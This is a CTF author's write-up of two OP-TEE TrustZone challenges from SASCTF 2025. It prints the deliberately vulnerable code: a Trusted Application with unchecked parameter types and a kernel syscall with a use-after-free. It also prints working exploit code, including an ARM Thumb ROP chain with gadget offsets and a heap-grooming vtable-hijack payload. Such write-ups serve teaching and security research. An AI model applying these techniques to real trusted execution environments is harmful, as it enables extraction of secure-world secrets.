Trust Issues & Broken Trust: OP-TEE Exploitation (SASCTF'25 Quals)
Tags: CTF, SASCTF, OP-TEE, TrustZone, ARM
I authored two OP-TEE exploitation challenges for the SASCTF 2025 Quals. The first one, Trust Issues, targets a vulnerable Trusted Application. The second, Broken Trust, goes deeper into the OP-TEE kernel itself. Both run on QEMU with OP-TEE 4.5.0.
Table of Contents:
Background: ARM TrustZone and OP-TEE
Challenge 1: Trust Issues (TA Exploitation)
Challenge 2: Broken Trust (Kernel Exploitation)
Background: ARM TrustZone and OP-TEE
ARM TrustZone is a hardware security extension that splits the processor into two worlds: the Normal World (where Linux, Android, etc. run) and the Secure World (where security-sensitive code runs in isolation). The two worlds share the same physical cores but have separate address spaces, and the hardware enforces that the normal world cannot access secure world memory. Transitions between worlds go through the Secure Monitor (EL3 on AArch64), typically via SMC (Secure Monitor Call) instructions.
OP-TEE (Open Portable Trusted Execution Environment) is an open-source TEE OS that runs in the secure world. It provides a kernel, a set of syscalls, and an environment for running Trusted Applications (TAs). TAs are small programs that run inside the TEE and can access secure storage, perform cryptographic operations, and handle sensitive data that the normal world shouldn’t see.
The communication flow looks like this: a normal-world client (running on Linux) opens a session to a TA via the TEE Client API (libteec). It then sends commands with parameters. Parameters can be either memory references (TEEC_MEMREF) pointing to shared buffers, or values (TEEC_VALUE) carrying raw integers. The OP-TEE driver marshals these across the world boundary, and the TA receives them as TEE_Param unions on the secure side.
One important security property: TAs are signed. OP-TEE verifies the signature before loading a TA, so you can’t just compile your own TA and load it. On top of that, OP-TEE’s secure storage is encrypted with a key derived from the Hardware Unique Key (HUK), which in this setup differs between builds. So even if you could somehow extract the encrypted storage, you couldn’t decrypt it without the correct HUK.
With that context, let’s get into the challenges.
Challenge 1: Trust Issues (TA Exploitation)
Category: pwn
Solves: 6
Description:
Target system is a secure-world Trustlet running inside a TEE. The codebase is signed, verified, and marked production ready. But something doesn’t add up.
The flag is stored in OP-TEE’s secure storage under the object ID "flag". The goal is to read it out.
Why You Can’t Just Load Your Own TA
As mentioned above, TAs are signed, and the production environment uses a custom TA_SIGN_KEY, so loading your own TA is not an option. The CMD_READ_SECURE_OBJECT command is also compiled out in production: it only exists under #ifdef PARTICIPANTS_BUILD / #ifdef STAGING_BUILD.
More importantly, the production build uses a different HUK (Hardware Unique Key). OP-TEE derives its secure storage encryption keys from the HUK, so each build variant has its own set of keys:
#ifdef STAGING_BUILD
static const uint8_t huk[] = { 0x4A, 0xE8, 0xBB, 0xB1, ... };
memcpy(hwkey->data, huk, sizeof(huk));
#elif PARTICIPANTS_BUILD
static const uint8_t huk[] = { 0x00, 0x01, 0x02, ... };
memcpy(hwkey->data, huk, sizeof(huk));
#endif
Even if you could extract the encrypted storage from the filesystem, you couldn’t decrypt it without the production HUK.
The Trusted Application
The TA implements a simplified Brainfuck interpreter. Three commands are available:
- CMD_RUN_CODE (0): run Brainfuck code with input/output buffers
- CMD_WRITE_SECURE_OBJECT (1): write data to secure storage (used during flag setup)
- CMD_READ_SECURE_OBJECT (2): read from secure storage (compiled out in production)
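The Brainfuck VM supports six operations: + and - increment and decrement the current cell, > and < move the memory pointer, , reads a byte from input into memory, and . writes a byte from memory to output. Unlike standard Brainfuck, both , and . also advance the memory pointer after each byte, and there are no loops ([ and ]).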
static TEE_Result run_code(VmContext_t *context) {
for (size_t i = 0; i < context->code_sz; i++) {
const char c = context->code[i];
switch (c) {
case '+': context->memory[context->memory_idx]++; break;
case '-': context->memory[context->memory_idx]--; break;
case '>': context->memory_idx++; break;
case '<': context->memory_idx--; break;
case '.':
context->output[context->output_idx++] =
context->memory[context->memory_idx++];
break;
case ',':
context->memory[context->memory_idx++] =
context->input[context->input_idx++];
break;
}
}
return TEE_SUCCESS;
}
The VmContext_t structure holds pointers to the code, input, output, and a 0x4000-byte memory tape:
typedef struct {
const char *code;
const size_t code_sz;
char *input;
size_t input_idx;
const size_t input_sz;
char *output;
size_t output_idx;
const size_t output_sz;
char *memory;
size_t memory_idx;
const size_t memory_sz;
} VmContext_t;
The Vulnerability: Type Confusion
The run_code_cmd handler expects three memory reference parameters (code, input, output), but it never validates the parameter types:
static TEE_Result run_code_cmd(uint32_t param_types, TEE_Param params[4]) {
uint32_t exp_param_types =
TEE_PARAM_TYPES(TEE_PARAM_TYPE_MEMREF_INPUT, // "Brainfuck" code
TEE_PARAM_TYPE_MEMREF_INOUT, // Input buffer
TEE_PARAM_TYPE_MEMREF_INOUT, // Output buffer
TEE_PARAM_TYPE_NONE);
// Oooops, forgot to check param types :(
// if (param_types != exp_param_types) {
// return TEE_ERROR_BAD_PARAMETERS;
// }
const char *code = params[0].memref.buffer;
char *input = params[1].memref.buffer;
char *output = params[2].memref.buffer;
...
Compare this to write_secure_object_cmd, which does the check properly:
if (param_types != exp_param_types)
return TEE_ERROR_BAD_PARAMETERS;
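To see what that single comparison buys you, here is a small host-side sketch of how the four parameter types are packed into param_types. The MOCK_ constants and helper names are mine; they mirror the values I believe the GlobalPlatform headers use, and a real TA would use TEE_PARAM_TYPES from the OP-TEE headers instead.

```c
#include <assert.h>
#include <stdint.h>

/* Local stand-ins for the GlobalPlatform constants (assumed values). */
enum {
    MOCK_TYPE_NONE         = 0,
    MOCK_TYPE_VALUE_INOUT  = 3,
    MOCK_TYPE_MEMREF_INPUT = 5,
    MOCK_TYPE_MEMREF_INOUT = 7,
};

/* Each parameter type occupies one 4-bit nibble of param_types. */
static uint32_t mock_param_types(uint32_t t0, uint32_t t1,
                                 uint32_t t2, uint32_t t3)
{
    return t0 | (t1 << 4) | (t2 << 8) | (t3 << 12);
}

/* The check run_code_cmd should have performed: 1 if the layout matches. */
static int params_ok(uint32_t got)
{
    const uint32_t expected =
        mock_param_types(MOCK_TYPE_MEMREF_INPUT, MOCK_TYPE_MEMREF_INOUT,
                         MOCK_TYPE_MEMREF_INOUT, MOCK_TYPE_NONE);
    return got == expected;
}
```

With the check in place, any layout that swaps a memref slot for a value slot produces a different packed word and is rejected before the handler ever touches params.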
The TEE_Param type is a union. It can hold either a memref (pointer + size) or a value (two uint32_t fields, a and b). The memref.buffer field and value.a field overlap at the same offset in the union. So if the normal-world client sends a TEEC_VALUE_INOUT parameter where the TA expects TEEC_MEMREF_INOUT, the TA interprets the integer value as a memory address.
This is the key insight: by passing an arbitrary address as value.a, you can make the Brainfuck VM read from or write to any address in the TA’s address space. The , operation reads bytes from “input” (actually your controlled address) into the VM memory, and . writes bytes from memory to “output” (also your controlled address).
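The overlap is easy to reproduce on a host machine. The sketch below uses a hypothetical MockParam union, not the real TEE_Param: pointers are modelled as uint32_t so the layout matches a 32-bit TA even when compiled on a 64-bit host.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical 32-bit model of TEE_Param (not the real header type). */
typedef union {
    struct { uint32_t buffer; uint32_t size; } memref;
    struct { uint32_t a; uint32_t b; } value;
} MockParam;

/* What the TA treats as the buffer address when the client sent a value. */
static uint32_t confused_buffer(uint32_t a, uint32_t b)
{
    MockParam p;
    p.value.a = a;            /* client-controlled integer */
    p.value.b = b;
    return p.memref.buffer;   /* same bytes, read back as an address */
}

/* What the TA treats as the buffer size in the same situation. */
static uint32_t confused_size(uint32_t a, uint32_t b)
{
    MockParam p;
    p.value.a = a;
    p.value.b = b;
    return p.memref.size;
}
```

In this model, value.a becomes the address and value.b becomes the size.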
Building The Primitives
The exploit communicates with the TA from a normal-world Linux client using libteec. The type confusion is triggered by mixing TEEC_MEMREF_TEMP_INOUT and TEEC_VALUE_INOUT parameter types:
// Normal: pass a shared memory buffer
set_tmpref_arg(TA_ARG_INPUT, &op, input_buffer, size);
// Exploit: pass a raw address instead
set_value_arg(TA_ARG_INPUT, &op, 0x00117000, 0x42424242);
The Brainfuck code itself is built programmatically. For reading N bytes from the confused “input” address into the output buffer:
generate_readn(code, 0x200); // 0x200 commas: read from input to memory
generate_mem_prev(code + 0x200, 0x200); // 0x200 '<': rewind memory pointer
generate_writen(code + 0x400, 0x200); // 0x200 dots: write memory to output
This gives arbitrary read. For arbitrary write, flip the direction: confuse the “output” parameter to point at the target address, then use , to read from a normal input buffer into memory, and . to write from memory to the target address.
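If you want to test such programs without a TEE, a host-side model is enough. This is a sketch, not the exploit’s actual helpers: emit, build_copy_program, model_run and model_copy are names I made up, and model_run just mirrors the run_code loop shown earlier.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: fill dst with n copies of one VM opcode. */
static char *emit(char *dst, char op, size_t n)
{
    memset(dst, op, n);
    return dst + n;
}

/* Build "read n bytes, rewind, write n bytes"; code needs 3 * n bytes. */
static size_t build_copy_program(char *code, size_t n)
{
    char *p = code;
    p = emit(p, ',', n);   /* input -> tape, pointer advances */
    p = emit(p, '<', n);   /* rewind the tape pointer */
    p = emit(p, '.', n);   /* tape -> output, pointer advances */
    return (size_t)(p - code);
}

/* Host-side model of the TA's run_code loop, for testing programs only. */
static void model_run(const char *code, size_t code_sz,
                      const char *input, char *output, char *tape)
{
    size_t in = 0, out = 0, mem = 0;
    for (size_t i = 0; i < code_sz; i++) {
        switch (code[i]) {
        case '+': tape[mem]++; break;
        case '-': tape[mem]--; break;
        case '>': mem++; break;
        case '<': mem--; break;
        case '.': output[out++] = tape[mem++]; break;
        case ',': tape[mem++] = input[in++]; break;
        }
    }
}

/* Copy n bytes (n <= 64) through the modelled VM; returns program length. */
static size_t model_copy(const char *src, char *dst, size_t n)
{
    char code[3 * 64];
    char tape[64] = {0};
    assert(n <= 64);
    size_t len = build_copy_program(code, n);
    model_run(code, len, src, dst, tape);
    return len;
}
```

In the real exploit the only difference is where input or output point: one of them is the confused address instead of a shared buffer.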
Exploitation: Three Invocations
ASLR is disabled (CFG_TA_ASLR=n), so addresses are predictable. The TA code base is at 0x00117000 and the stack starts at 0x0014a000.
Invocation 1: Confirm the code base. The input parameter is confused to point at 0x00117000. The Brainfuck code reads bytes from that address and copies them to a normal output buffer. If the first 10 bytes match the expected TA_CreateEntryPoint prologue (\x4D\xF8\x04\x7D\x00\xAF\x4F\xF0\x00\x03), the base address is confirmed:
op.paramTypes = TEEC_PARAM_TYPES(TEEC_MEMREF_TEMP_INOUT, TEEC_VALUE_INOUT,
TEEC_MEMREF_TEMP_INOUT, TEEC_NONE);
set_value_arg(TA_ARG_INPUT, &op, guessed_code_base, 0x42424242);
run_command(&sess, &op);
if (memcmp(output, "\x4D\xF8\x04\x7D\x00\xAF\x4F\xF0\x00\x03", 10) != 0)
errx(1, "Failed to guess the base address of the TA code section!");
Invocation 2: Stage data on the stack. Now the output parameter is confused to point at stack_base (0x0014a000). The exploit reads data from a normal input buffer (containing the object ID "flag" and space for the flag/handle) and writes it to the stack through the Brainfuck VM. This pre-stages the RopData_t structure at a known stack address:
typedef struct {
char object_id[4]; // "flag"
char flag_bytes[128]; // where the flag will be read into
uint32_t object_handle; // handle returned by OpenPersistentObject
uint32_t read_bytes; // bytes read counter
} RopData_t;
RopData_t *rop_data = (RopData_t *)input;
memcpy(rop_data->object_id, "flag", 4);
set_value_arg(TA_ARG_OUTPUT, &op, stack_base, 0x41414141);
Invocation 3: Write the ROP chain and trigger it. The output parameter is confused to point at stack_base + 0x2664 (the return address location). The Brainfuck code writes the ROP chain there. When run_code returns, the corrupted return address redirects execution into the chain.
The ROP Chain
The TA runs in AArch32 (Thumb-2) mode. We can’t allocate executable memory inside the TA, so ROP is the way. The chain needs to:
- Open the "flag" object from secure storage
- Read the flag data
- Copy it to a shared buffer so the normal-world client can see it
The TA conveniently includes an OpenPersistentObjectWrapper that wraps TEE_OpenPersistentObject with only 4 arguments (instead of 5), making it easier to call from a ROP chain on ARM where the first 4 args go in r0-r3:
static TEE_Result OpenPersistentObjectWrapper(TEE_ObjectHandle *object,
const char *obj_id,
size_t obj_id_sz,
uint32_t obj_data_flag) {
return TEE_OpenPersistentObject(TEE_STORAGE_PRIVATE, obj_id,
obj_id_sz, obj_data_flag, object);
}
The key gadget is pop {r0, r1, r2, r3}; pop {ip, pc} at offset 0x1f84, which loads all four argument registers plus a control flow target in one shot.
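We jump past each function’s prologue so it doesn’t disturb the chain (the skipped part is basically just the first STRD.W R7, LR, [SP,#-8+var_s0]!). Each function’s epilogue still pops r7 and the return address, which is why every later stage starts with a padding word for r7. Since these functions are Thumb code, their addresses are ORed with 1.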
const uint32_t pop_r0_r1_r2_r3_pop_ip_pc = ta_code_base + 0x00001f84;
const uint32_t memcpy_unchecked = (ta_code_base + 0x11AE4) | 1;
const uint32_t openpersistentobjectwrapper = (ta_code_base + 0x61c) | 1;
const uint32_t tee_read_object_data = (ta_code_base + 0x5A28) | 1;
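A note on the arithmetic: in C, + binds tighter than |, so base + offset | 1 and (base + offset) | 1 are the same expression. A tiny helper (thumb_addr is a hypothetical name, not something from the exploit) makes the intent explicit:

```c
#include <assert.h>
#include <stdint.h>

/* Address of a Thumb-mode target: base + offset with bit 0 set, so that
 * loading it into pc keeps the core in Thumb state. */
static uint32_t thumb_addr(uint32_t base, uint32_t offset)
{
    return (base + offset) | 1u;
}
```

With the code base at 0x00117000, the wrapper at offset 0x61c ends up at 0x0011761d.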
The chain has four stages:
Stage 1: Open the persistent object. Call OpenPersistentObjectWrapper(&object_handle, "flag", 4, 0x11). The 0x11 is TEE_DATA_FLAG_ACCESS_READ | TEE_DATA_FLAG_SHARE_READ. The handle gets written to stack_base + offsetof(RopData_t, object_handle):
P32(pop_r0_r1_r2_r3_pop_ip_pc, rop);
P32(stack_base + offsetof(RopData_t, object_handle), rop); // r0 = &handle
P32(stack_base + offsetof(RopData_t, object_id), rop); // r1 = "flag"
P32(sizeof(((RopData_t *)0)->object_id), rop); // r2 = 4
P32(0x11, rop); // r3 = flags
P32(0x45454545, rop); // ip (junk)
P32(openpersistentobjectwrapper, rop); // pc
Stage 2: Dereference the handle. OpenPersistentObjectWrapper writes the handle through the pointer we passed in r0, so it lands in the object_handle field of RopData_t. But TEE_ReadObjectData needs the handle by value, not by pointer. So we use memcpy_unchecked to copy the 4-byte handle from where OP-TEE stored it (stack_base + offsetof(RopData_t, object_handle)) into the ROP chain itself, at stack_base + 0x26a8, the slot from which r0 will be loaded for the next call:
P32(0x41414141, rop); // padding (r7)
P32(pop_r0_r1_r2_r3_pop_ip_pc, rop);
P32(stack_base + 0x26a8, rop); // r0 = dst
P32(stack_base + offsetof(RopData_t, object_handle), rop); // r1 = src
P32(sizeof(((RopData_t *)0)->object_handle), rop); // r2 = 4
P32(0x41414141, rop); // r3 (junk)
P32(0x41414141, rop); // ip (junk)
P32(memcpy_unchecked, rop); // pc
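The 0x26a8 is not magic; it falls out of counting chain slots. Here is the arithmetic as a sketch, assuming (as described above) that the chain starts exactly at the return address slot at stack_base + 0x2664. The constant and function names are mine.

```c
#include <assert.h>
#include <stdint.h>

enum {
    WORD            = 4,      /* one P32 slot */
    RET_ADDR_OFFSET = 0x2664, /* return address, relative to stack_base */
    STAGE1_WORDS    = 7,      /* gadget, r0..r3, ip, pc */
    STAGE2_WORDS    = 8,      /* r7 padding, gadget, r0..r3, ip, pc */
    STAGE3_R0_INDEX = 2,      /* r7 padding and gadget come before r0 */
};

/* Offset from stack_base of the word that stage 3 pops into r0. */
static uint32_t stage3_r0_offset(void)
{
    return RET_ADDR_OFFSET +
           WORD * (STAGE1_WORDS + STAGE2_WORDS + STAGE3_R0_INDEX);
}
```

That is 17 words (0x44 bytes) past the return address, which is exactly where the 0x41424344 placeholder of the next stage sits.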
Stage 3: Read the flag. Call TEE_ReadObjectData(handle, flag_bytes, 128, &read_bytes):
P32(0x41414141, rop); // r7
P32(pop_r0_r1_r2_r3_pop_ip_pc, rop);
P32(0x41424344, rop); // r0 = handle (patched by stage 2)
P32(stack_base + offsetof(RopData_t, flag_bytes), rop); // r1 = output buf
P32(128, rop); // r2 = size
P32(stack_base + offsetof(RopData_t, read_bytes), rop); // r3 = &read_bytes
P32(0x41414141, rop); // ip
P32(tee_read_object_data, rop); // pc
Stage 4: Copy the flag to the shared buffer. The flag is now in flag_bytes on the stack, but the normal-world client can’t see the TA’s stack. So we use memcpy_unchecked to copy it to input_param_location + 0x01b8, which is the shared memory buffer mapped at 0x00200000:
P32(0x41414141, rop);
P32(pop_r0_r1_r2_r3_pop_ip_pc, rop);
P32(input_param_location + 0x01b8, rop); // r0 = dst (shared buf)
P32(stack_base + offsetof(RopData_t, flag_bytes), rop); // r1 = src (flag on stack)
P32(sizeof(((RopData_t *)0)->flag_bytes), rop); // r2 = 128
P32(0x41414141, rop); // r3
P32(0x41414141, rop); // ip
P32(memcpy_unchecked, rop); // pc
After this, the normal-world client just reads the input buffer:
printf("Input buffer (should be flag???): %s\n", input);
And indeed, after running the exploit, the client prints the flag.
Full exploit: exploit.c
Challenge 2: Broken Trust (Kernel Exploitation)
Category: pwn
Solves: 1
Description:
Now, you’ll need to exploit a vulnerability in the OP-TEE kernel itself to call a privileged SMC handler and get the flag.
This one is a step up. The flag lives inside a custom SMC handler in TF-A (Trusted Firmware-A, the EL3 Secure Monitor). To reach it, you need arbitrary code execution in the OP-TEE kernel (S-EL1), not just in a TA (S-EL0).
Unlike Trust Issues, here the default OP-TEE signing keys are used, so participants can load their own TAs. The challenge is exploiting the kernel from within a TA.
The Architecture
The setup spans three privilege levels:
- TF-A (EL3): contains the custom SMC handlers. One returns a healthcheck string, the other returns the flag. Both are only callable from the secure world.
- OP-TEE kernel (S-EL1): patched with a vulnerable custom syscall. Contains the sas_do_smc_healthcheck wrapper function.
- TA (S-EL0): user-written code running inside the TEE. Can invoke syscalls to talk to the kernel.
The flag handler in TF-A:
static uintptr_t sas_flag_smc_handler(void *handle) {
volatile const char flag[40] = "SAS{FLAG!!!!!!!!AAAAAAAAAAAAAAAAAAAAAAA}";
const uint64_t p1 = *(uint64_t *)flag;
const uint64_t p2 = *(uint64_t *)(flag + 8);
const uint64_t p3 = *(uint64_t *)(flag + 16);
const uint64_t p4 = *(uint64_t *)(flag + 24);
const uint64_t p5 = *(uint64_t *)(flag + 32);
SMC_RET6(handle, SMC_OK, p1, p2, p3, p4, p5);
}
It returns the flag split across SMC return registers. But it checks is_caller_non_secure(flags) and rejects calls from the normal world. The OP-TEE kernel has a convenient wrapper:
void sas_do_smc_healthcheck(uint32_t smc_id, char *out_buffer)
{
smc_id = (smc_id == 0xc2001338) ? 0xc2001338 : 0xc2001337;
struct thread_smc_args args = { .a0 = smc_id };
thread_smccc(&args);
*(uint64_t *)(&out_buffer[0]) = args.a1;
*(uint64_t *)(&out_buffer[8]) = args.a2;
...
}
If you call this with smc_id != 0xc2001338, it gets clamped to 0xc2001337 (the flag SMC). So the goal is: get the kernel to call sas_do_smc_healthcheck with any non-healthcheck argument, and provide an output buffer you can read.
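The selection logic and the register unpacking can be modelled on the host. This is only a sketch: the macro and function names are hypothetical, and unpack_regs assumes the elided part of the wrapper stores the remaining return registers the same way as the first two.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define SMC_HEALTHCHECK 0xc2001338u   /* IDs taken from the wrapper above */
#define SMC_FLAG        0xc2001337u

/* Same selection as the wrapper: anything that is not the healthcheck ID
 * becomes the flag SMC. */
static uint32_t select_smc(uint32_t requested)
{
    return (requested == SMC_HEALTHCHECK) ? SMC_HEALTHCHECK : SMC_FLAG;
}

/* Reassemble a 40-byte string from five 64-bit return registers. */
static void unpack_regs(const uint64_t regs[5], char out[41])
{
    memcpy(out, regs, 40);   /* registers hold the bytes in memory order */
    out[40] = '\0';
}
```

So the argument value does not have to be chosen carefully: anything other than 0xc2001338 in the first argument register selects the flag SMC.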
The Custom Syscall
The OP-TEE kernel is patched with syscall number 0x45, syscall_sas. It’s a simple allocator with CRUD operations on up to 10 kernel heap buffers:
enum sas_cmd {
SAS_CMD_ALLOC_MEM = 0x1,
SAS_CMD_FREE_MEM = 0x2,
SAS_CMD_WRITE_MEM = 0x3,
SAS_CMD_READ_MEM = 0x4,
};
struct mem_entry {
size_t size;
void *va;
};
static struct mem_entry memdb[10] = {};
The alloc/free/read/write handlers:
static TEE_Result handle_alloc(unsigned long id, size_t len)
{
void *va = malloc(len);
if (!va)
return TEE_ERROR_OUT_OF_MEMORY;
memdb[id].va = va;
memdb[id].size = len;
return TEE_SUCCESS;
}
static TEE_Result handle_free(unsigned long id)
{
free(memdb[id].va);
return TEE_SUCCESS;
}
static TEE_Result handle_write(unsigned long id, void *buf, size_t len)
{
if (len > memdb[id].size)
return TEE_ERROR_BAD_PARAMETERS;
void *va = memdb[id].va;
if (!va)
return TEE_ERROR_ACCESS_DENIED;
return copy_from_user(va, buf, len);
}
static TEE_Result handle_read(unsigned long id, void *buf, size_t len)
{
if (len > memdb[id].size)
return TEE_ERROR_BAD_PARAMETERS;
void *va = memdb[id].va;
if (!va)
return TEE_ERROR_ACCESS_DENIED;
return copy_to_user(buf, va, len);
}
The Vulnerability: Use-After-Free
Look at handle_free: it frees the buffer but never NULLs out memdb[id].va or resets memdb[id].size. This means:
- Use-after-free: after freeing entry i, you can still call handle_write(i, ...) and handle_read(i, ...). The stale pointer passes the if (!va) check, so you read from and write to freed memory.
- Double-free: you can call handle_free(i) multiple times on the same entry.
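For contrast, here is roughly what a non-vulnerable version could look like, written as a host-side model rather than kernel code. Assumptions: the MODEL_ status codes and fixed_ function names are made up, malloc/free/memcpy stand in for the kernel heap and copy_from_user, and the id bounds check is my addition (the handlers shown above do not include one).

```c
#include <assert.h>
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

#define MEMDB_SLOTS 10

/* Hypothetical status codes for this host-side model only. */
enum { MODEL_OK, MODEL_ERR_BAD_PARAMETERS, MODEL_ERR_ACCESS_DENIED,
       MODEL_ERR_OUT_OF_MEMORY };

struct mem_entry { size_t size; void *va; };
static struct mem_entry memdb[MEMDB_SLOTS];

static int fixed_alloc(size_t id, size_t len)
{
    if (id >= MEMDB_SLOTS || memdb[id].va)
        return MODEL_ERR_BAD_PARAMETERS;  /* out of range or slot in use */
    void *va = malloc(len);
    if (!va)
        return MODEL_ERR_OUT_OF_MEMORY;
    memdb[id].va = va;
    memdb[id].size = len;
    return MODEL_OK;
}

static int fixed_free(size_t id)
{
    if (id >= MEMDB_SLOTS)
        return MODEL_ERR_BAD_PARAMETERS;
    free(memdb[id].va);      /* free(NULL) is a no-op, so repeats are safe */
    memdb[id].va = NULL;     /* drop the stale pointer */
    memdb[id].size = 0;      /* and the stale size */
    return MODEL_OK;
}

static int fixed_write(size_t id, const void *buf, size_t len)
{
    if (id >= MEMDB_SLOTS)
        return MODEL_ERR_BAD_PARAMETERS;
    if (!memdb[id].va)
        return MODEL_ERR_ACCESS_DENIED;   /* freed or never allocated */
    if (len > memdb[id].size)
        return MODEL_ERR_BAD_PARAMETERS;
    memcpy(memdb[id].va, buf, len);       /* stands in for copy_from_user */
    return MODEL_OK;
}
```

Clearing va and size in the free path is the whole fix: both the use-after-free and the double-free depend on the entry surviving the free.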
The TA invokes the syscall via inline assembly (syscall 0x45):
static TEE_Result do_svc(uint64_t op, uint64_t id, void *buf, size_t len) {
volatile register uint64_t x8 __asm("x8") = 0x45; // SVC number
volatile register uint64_t x0 __asm("x0") = op;
volatile register uint64_t x1 __asm("x1") = id;
volatile register uint64_t x2 __asm("x2") = (uint64_t)buf;
volatile register uint64_t x3 __asm("x3") = len;
__asm volatile("svc #0" : "=r"(x0) : "r"(x0), "r"(x1), "r"(x2), "r"(x3),
"r"(x8) : "memory");
return x0;
}
Exploitation: VTable Hijacking
OP-TEE’s kernel heap uses first-fit allocation. The exploit abuses this to overlap SAS-controlled buffers with crypto operation objects, then corrupts their virtual function tables.
Step 1: Allocate and free. Allocate 10 buffers of 0x1000 bytes through the SAS syscall, then free all of them:
for (uint32_t i = 0; i < 10; i++)
alloc(i, 0x1000);
for (uint32_t i = 0; i < 10; i++)
free_entry(i);
Step 2: Trigger reuse. Allocate 10 digest operations with TEE_AllocateOperation and TEE_ALG_SHA512. The kernel allocates internal crypto_hash_ctx structures for these, and due to first-fit, they land in the buffers we just freed:
TEE_OperationHandle objects[10];
for (uint32_t i = 0; i < 10; i++) {
res = TEE_AllocateOperation(&objects[i], TEE_ALG_SHA512,
TEE_MODE_DIGEST, 0);
}
Step 3: Corrupt via stale handles. The SAS syscall’s write handler still has valid (stale) pointers to these buffers. We write crafted data through the old handles, overwriting the internals of the crypto_hash_ctx structures. The critical target is the ops pointer, a virtual function table that controls what happens when you call digest operations:
char data[0x1000] = {0};
memset(data, 0x41, sizeof(data));
// Point ops->update (and other vtable entries) to sas_do_smc_healthcheck
for (uint32_t i = 0; i < 458; i++)
p64(0xE1AD6FC, (data + i * 8));
// Overwrite ops pointers in the crypto context structures
for (uint32_t i = 375; i < 512; i++)
p64(0xe145f20, (data + i * 8));
for (uint32_t i = 0; i < 10; i++)
write(i, data, 0x1000);
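The two loops overlap (words 375 to 457 are written twice), so the resulting layout is easier to see when built in one pass. A host-side sketch with hypothetical helper names; the two addresses are the ones from the snippet above:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define PAYLOAD_SIZE  0x1000
#define PAYLOAD_WORDS (PAYLOAD_SIZE / 8)   /* 512 64-bit words */

/* Store a 64-bit value at dst in host byte order. */
static void put64(uint64_t v, unsigned char *dst)
{
    memcpy(dst, &v, sizeof v);
}

/* Words [0, split) hold func_addr; words [split, 512) hold table_addr. */
static void build_payload(unsigned char *data, uint64_t func_addr,
                          uint64_t table_addr, size_t split)
{
    for (size_t i = 0; i < PAYLOAD_WORDS; i++)
        put64(i < split ? func_addr : table_addr, data + i * 8);
}

/* Read back word i of the payload, for inspection. */
static uint64_t payload_word(const unsigned char *data, size_t i)
{
    uint64_t v;
    memcpy(&v, data + i * 8, sizeof v);
    return v;
}
```

Calling build_payload(data, 0xE1AD6FC, 0xe145f20, 375) produces the same bytes as the two loops: the function address in words 0 to 374 and the table address in words 375 to 511.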
ASLR is disabled (CFG_CORE_ASLR=n), so the kernel addresses of sas_do_smc_healthcheck and the fake vtable location are known.
Step 4: Trigger the call. Invoke TEE_DigestUpdate on each corrupted operation. This dispatches through the poisoned ops table, calling sas_do_smc_healthcheck in kernel context. Since TEE_DigestUpdate passes a data buffer and length as arguments, and sas_do_smc_healthcheck takes (uint32_t smc_id, char *out_buffer), the first argument ends up being something other than 0xc2001338, which means the kernel calls the flag SMC:
for (uint32_t i = 0; i < total_objects; i++)
TEE_DigestUpdate(objects[i], params[2].memref.buffer, 0x100);
The flag gets written into the output buffer via the SMC return registers, and the normal-world host reads it back.
One subtlety: using the high-level TEE_DigestDoFinal API causes a TA panic because sas_do_smc_healthcheck returns a non-zero value that the wrapper interprets as an error. The solution is to use TEE_DigestUpdate (or the even lower-level _utee_hash_final syscall) which has more lenient error handling.
The exploit is not fully reliable due to heap layout sensitivity and may need multiple attempts.
Full exploit: exploit.c
That’s it. All source code and exploits: Team-Drovosec/sasctf-quals-2025.
Shoutout to LCD team (s41nt0l3xus, @wx0rx and @phoen1xxx) who solved both and wrote up their own approach: